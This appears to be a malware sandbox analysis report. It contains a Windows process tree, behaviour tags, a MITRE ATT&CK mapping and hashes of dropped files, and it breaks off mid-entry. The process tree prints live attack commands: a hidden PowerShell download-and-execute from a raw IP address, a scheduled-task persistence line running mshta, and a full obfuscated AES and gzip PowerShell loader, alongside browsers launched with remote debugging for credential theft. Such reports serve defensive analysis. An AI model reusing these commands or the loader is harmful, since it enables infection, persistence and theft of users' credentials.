        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4684 -childID 5 -isForBrowser -prefsHandle 4692 -prefMapHandle 5472 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1112 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {21ed007a-009b-40c3-8951-0604689b7b62} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" tab
        6⤵
        
        PID:5764
- - C:\Users\Admin\AppData\Local\Temp\1085414001\00610290ee.exe
    "C:\Users\Admin\AppData\Local\Temp\1085414001\00610290ee.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:3460
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn evWuYmajL8q /tr "mshta C:\Users\Admin\AppData\Local\Temp\Wl08JKkUA.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:4316
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn evWuYmajL8q /tr "mshta C:\Users\Admin\AppData\Local\Temp\Wl08JKkUA.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:5896
  - - C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\Wl08JKkUA.hta
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      PID:2428
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6ZEGGEVYREPLWB9DBYD2R56YX3HA5GQK.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:388
      - C:\Users\Admin\AppData\Local\Temp6ZEGGEVYREPLWB9DBYD2R56YX3HA5GQK.EXE
        
        "C:\Users\Admin\AppData\Local\Temp6ZEGGEVYREPLWB9DBYD2R56YX3HA5GQK.EXE"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1404
- - C:\Users\Admin\AppData\Local\Temp\1085415001\Bjkm5hE.exe
    "C:\Users\Admin\AppData\Local\Temp\1085415001\Bjkm5hE.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:5360
  - - C:\Users\Admin\AppData\Local\Temp\1085415001\Bjkm5hE.exe
      "C:\Users\Admin\AppData\Local\Temp\1085415001\Bjkm5hE.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:4324
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5360 -s 956
      4⤵
      Program crash
      PID:2228
- - C:\Users\Admin\AppData\Local\Temp\1085416001\d2YQIJa.exe
    "C:\Users\Admin\AppData\Local\Temp\1085416001\d2YQIJa.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2332
- - C:\Users\Admin\AppData\Local\Temp\1085417001\DTQCxXZ.exe
    "C:\Users\Admin\AppData\Local\Temp\1085417001\DTQCxXZ.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2804
- - C:\Users\Admin\AppData\Local\Temp\1085418001\bea16bd486.exe
    "C:\Users\Admin\AppData\Local\Temp\1085418001\bea16bd486.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4404
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      Downloads MZ/PE file
      System Location Discovery: System Language Discovery
      PID:5724
- - C:\Users\Admin\AppData\Local\Temp\1085419001\Ta3ZyUR.exe
    "C:\Users\Admin\AppData\Local\Temp\1085419001\Ta3ZyUR.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:792
  - - C:\Users\Admin\AppData\Local\Temp\1085419001\Ta3ZyUR.exe
      "C:\Users\Admin\AppData\Local\Temp\1085419001\Ta3ZyUR.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1472
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 792 -s 956
      4⤵
      Program crash
      PID:3560
- - C:\Users\Admin\AppData\Local\Temp\1085420001\8d61319260.exe
    "C:\Users\Admin\AppData\Local\Temp\1085420001\8d61319260.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:1872
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1085421041\tYliuwV.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops startup file
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:6032
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5012
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2452
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        5⤵
        Blocklisted process makes network request
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3008
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3416
- - C:\Users\Admin\AppData\Local\Temp\1085422001\7aencsM.exe
    "C:\Users\Admin\AppData\Local\Temp\1085422001\7aencsM.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:3616
  - - C:\Users\Admin\AppData\Local\Temp\1085422001\7aencsM.exe
      "C:\Users\Admin\AppData\Local\Temp\1085422001\7aencsM.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      PID:5748
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:5804
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe55b7cc40,0x7ffe55b7cc4c,0x7ffe55b7cc58
        6⤵
        
        PID:1404
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2016,i,14874140915571281360,16577177019951117306,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2004 /prefetch:2
        6⤵
        
        PID:444
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1828,i,14874140915571281360,16577177019951117306,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2028 /prefetch:3
        6⤵
        
        PID:1516
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2248,i,14874140915571281360,16577177019951117306,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2456 /prefetch:8
        6⤵
        
        PID:4120
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3188,i,14874140915571281360,16577177019951117306,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3208 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5796
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3212,i,14874140915571281360,16577177019951117306,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3248 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:4260
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4272,i,14874140915571281360,16577177019951117306,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4552 /prefetch:8
        6⤵
        
        PID:3448
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4268,i,14874140915571281360,16577177019951117306,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4468 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:1168
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4248,i,14874140915571281360,16577177019951117306,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4532 /prefetch:8
        6⤵
        
        PID:5628
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4500,i,14874140915571281360,16577177019951117306,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4820 /prefetch:8
        6⤵
        
        PID:1572
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4628,i,14874140915571281360,16577177019951117306,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4604 /prefetch:8
        6⤵
        
        PID:5104
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:6492
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe57f346f8,0x7ffe57f34708,0x7ffe57f34718
        6⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:6484
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,8684129748175712543,4366327926043600541,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
        6⤵
        
        PID:6000
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,8684129748175712543,4366327926043600541,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
        6⤵
        
        PID:5280
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,8684129748175712543,4366327926043600541,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2776 /prefetch:8
        6⤵
        
        PID:5980
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2140,8684129748175712543,4366327926043600541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5712
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2140,8684129748175712543,4366327926043600541,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:4356
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2140,8684129748175712543,4366327926043600541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4808 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:6204
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2140,8684129748175712543,4366327926043600541,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4860 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:6280
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\9zmy5" & exit
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1004
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        6⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:6312
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3616 -s 968
      4⤵
      Program crash
      PID:1064
- - C:\Users\Admin\AppData\Local\Temp\1085424001\08228ffca5.exe
    "C:\Users\Admin\AppData\Local\Temp\1085424001\08228ffca5.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:824
- - C:\Users\Admin\AppData\Local\Temp\1085425001\ba087850fc.exe
    "C:\Users\Admin\AppData\Local\Temp\1085425001\ba087850fc.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:7088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2012 -ip 2012
1⤵
PID:1668

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1172

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
- Executes dropped EXE
PID:5832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5360 -ip 5360
1⤵
PID:1432

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 792 -ip 792
1⤵
PID:5828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3740 -ip 3740
1⤵
PID:824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3616 -ip 3616
1⤵
PID:6016

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4412

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4364

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
- Executes dropped EXE
PID:880

C:\Users\Admin\AppData\Local\Temp\service123.exe
C:\Users\Admin\AppData\Local\Temp\/service123.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5820

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3740

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1516

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
- Executes dropped EXE
PID:6488

C:\Users\Admin\AppData\Local\Temp\service123.exe
C:\Users\Admin\AppData\Local\Temp\/service123.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2688

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Modify Authentication Process

T1556

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Authentication Process

T1556

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin:.repos

Filesize
1.2MB

MD5
f1ee64dd9774361cb2b7533be856bf84

SHA1
01fb10ab8922b1578fcd55df6057fb3cb9f51ce8

SHA256
086c4921efe203575d1fb25ac96e47ba1f809623f4effd39483f9757a6e566af

SHA512
8aa29dd4868f4dd299d031aeb9324f5501e16d82b385bcc6399c7f09db8f52ea7098856f70c728084a126532b5d5a8fd238209f5504ccb20e53a46e17603f322

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
bd91c0f22d990f53b9f7cb0702985f50

SHA1
276b3c7852a75182cbc21d8e8406832ec7ec72f4

SHA256
f710a6f822b0eee3d2b75844dec5ad14a84f1a9560fd2dfe2293bd8af5df64ab

SHA512
adcc09d91dec4e4115c1ca0b8bec0e8e718691c45e001747b84da1d4ef2e4f3cad2e97675606053b663c83c862eec4ec8c750ffbc8e77b8f646a832853a18e1e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
a4852fc46a00b2fbd09817fcd179715d

SHA1
b5233a493ea793f7e810e578fe415a96e8298a3c

SHA256
6cbb88dea372a5b15d661e78a983b0c46f7ae4d72416978814a17aa65a73079f

SHA512
38972cf90f5ca9286761280fcf8aa375f316eb59733466375f8ba055ce84b6c54e2297bad9a4212374c860898517e5a0c69343190fc4753aafc904557c1ea6dc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
0d6b4373e059c5b1fc25b68e6d990827

SHA1
b924e33d05263bffdff75d218043eed370108161

SHA256
